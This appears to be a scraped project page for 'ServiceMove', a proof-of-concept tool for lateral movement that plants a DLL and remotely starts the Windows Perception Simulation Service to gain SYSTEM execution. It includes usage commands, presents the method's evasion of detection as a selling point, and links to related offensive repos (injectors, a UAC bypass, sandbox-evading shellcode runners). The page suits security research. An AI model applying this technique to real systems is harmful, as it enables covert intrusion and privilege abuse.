New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.

Overview

BOF - Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking


ServiceMove is a POC code for an interesting lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.

A non-existing DLL file (i.e., hid.dll) will be loaded everytime when "Windows Perception Simulation Service" was started. By inserting a crafted DLL in "C:\Windows\System32\PerceptionSimulation" and starting the service remotely, we were able to achieve code execution as "NT AUTHORITY\SYSTEM" in a remote system.

The beauty of this technique is that it is relatively sleathy/OPSEC since it doesn't have the typical IOCs like other general lateral movement techniques (e.g., service creation/modification, scheduled task creation). All it will do is just dropping a file to remote system and starting a service remotely.

Limitation

Windows 10 1809 or above only

Common Line Usage

Version: 1.0
Author: Chris Au
Twitter: @netero_1010
Github: @netero1010

===General use===  
Command: bof-servicemove target /root/hid.dll  

===Force mode===  
Description: restart the service if the service is already running  
Command: bof-servicemove target /root/hid.dll force

===Cleanup mode===  
Description: stop the service if running and delete the DLL payload file  
Command: bof-servicemove target cleanup

Compile

make

Export Functions for "hid.dll"

Ref to exports_function_hid.txt

Demo

HowTo

You might also like...
A method from GH on how to stream a dll without touching disk, TAGS: fortnite cheat fortnite injector dll injector
A method from GH on how to stream a dll without touching disk, TAGS: fortnite cheat fortnite injector dll injector

dll-encryptor People who make pay hacks typically have down syndrome and are incapable of using their brains in any fashion, and yet these bath salt s

Shared to msvcrt.dll or ucrtbase.dll and optimize the C/C++ application file size.
Shared to msvcrt.dll or ucrtbase.dll and optimize the C/C++ application file size.

VC-LTL - An elegant way to compile lighter binaries. 简体中文 I would like to turn into a stone bridge, go through 500 years of wind, 500 years of Sun, ra

DLL Hooker using DLL Redirection
DLL Hooker using DLL Redirection

DLLHooker DLL Hooker using DLL Redirection. Development Environment IDE: Visual Studio 2019 Demonstration References [1] https://www.exploit-db.com/do

This repo includes SVO Pro which is the newest version of Semi-direct Visual Odometry (SVO) developed over the past few years at the Robotics and Perception Group (RPG).
This repo includes SVO Pro which is the newest version of Semi-direct Visual Odometry (SVO) developed over the past few years at the Robotics and Perception Group (RPG).

rpg_svo_pro This repo includes SVO Pro which is the newest version of Semi-direct Visual Odometry (SVO) developed over the past few years at the Robot

A collection of DLLs that use search order hijacking to automatically inject specified DLLs.

🐨 Koaloader 📥 A collection of DLLs that use search order hijacking to automatically inject specified DLLs. 🚀 Usage Simply place one of the proxy dl

Multi-sensor perception for autonomous vehicles
Multi-sensor perception for autonomous vehicles

Multi-Sensor Fusion for Perception -- 多传感器融合感知 Maintained by Ge Yao, [email protected] Up & Running Overview 本Repo为基于ROS melodic @ Ubuntu 18.04的Mul

x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

anycall x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration Read: https://www.godeye.club/2021/05/14/0

Arduino based bicycle movement sensor and GPS tracker
Arduino based bicycle movement sensor and GPS tracker

Bike Tracker Background There are actually plenty of bicycle trackers around, so why make your own? Well, so that it works the way you want it… And it

A Simple tool to execute shellcode with the ability to detect mouse movement
A Simple tool to execute shellcode with the ability to detect mouse movement

Noobi A Simple tool to execute shellcode with the ability to detect mouse movement Features: Sandbox evasion through detecting mouse movement and chec

Owner
Chris Au
Chris Au
Simple one file header for hijacking windows version.dll for desired executable to do 3rd party modifying without dll injection.

Version-Hijack Simple one file header for hijacking windows version.dll for desired executable to do 3rd party modifying without dll injection. Usage

sneakyevil 5 Mar 31, 2022
Implements a Windows service (in a DLL) that removes the rounded corners for windows in Windows 11

ep_dwm Implements a Windows service that removes the rounded corners for windows in Windows 11. Tested on Windows 11 build 22000.434. Pre-compiled bin

Valentin-Gabriel Radu 19 Sep 22, 2022
An example of COM hijacking using a proxy DLL.

COM-Hijacking An example of COM hijacking using a proxy DLL. Demo using getmac/wbemprox.dll In this demo, we use the fact that the getmac.exe command

Solomon Sklash 15 Sep 15, 2022
Bypass UAC at any level by abusing the Program Compatibility Assistant with RPC, WDI, and more Windows components

ByeIntegrity 8.0 The eighth Windows privilege escalation attack in the ByeIntegrity family. ByeIntegrity 8.0 is the most complex one I've created so f

Arush Agarampur 215 Aug 30, 2022
My version of psxfunkin with new changes like new story mode, new options,etc

PSXFunkin Friday Night Funkin' on the PSX LOL Compilation Refer to COMPILE.md here Characters Igor Ver added new characters Like XmasGF,Monster and mu

IgorSou3000 4 Jun 8, 2022
Inject dll to cmd.exe to prevent file execution.

Console-Process-Execution Inject dll to cmd.exe to prevent file execution. Requierments: Microsoft Detours Library - https://github.com/microsoft/Deto

null 4 Dec 19, 2021
the implementations of 'A Flexible New Technique for Camera Calibration' and Bouguet's method

StereoCameraCalibration MonocularCameraCalibration/StereoCameraCalibration/StereoCameraRectification 1、Class "MonocularCameraCalibration" provides the

gtc1072 6 Apr 14, 2022
Fuses IMU readings with a complementary filter to achieve accurate pitch and roll readings.

SimpleFusion A library that fuses accelerometer and gyroscope readings quickly and easily with a complementary filter. Overview This library combines

Sean Boerhout 5 Aug 22, 2022
BMI_automatics-faceshielding-device - this is a project utilizing STM32, MATLAB,Softmax classifier to achieve a portable face shielding(mask) device

BMI_automatics-faceshielding-device this is a project utilizing STM32, MATLAB,Softmax classifier to achieve a portable face shielding(mask) device in

Lyu Tian 2 Dec 23, 2021
Collection of DLL function export forwards for DLL export function proxying

dll-exports Collection of DLL function export forwards for DLL export function proxying. Typical usecase is for backdooring applications for persisten

Magnus Stubman 47 Sep 14, 2022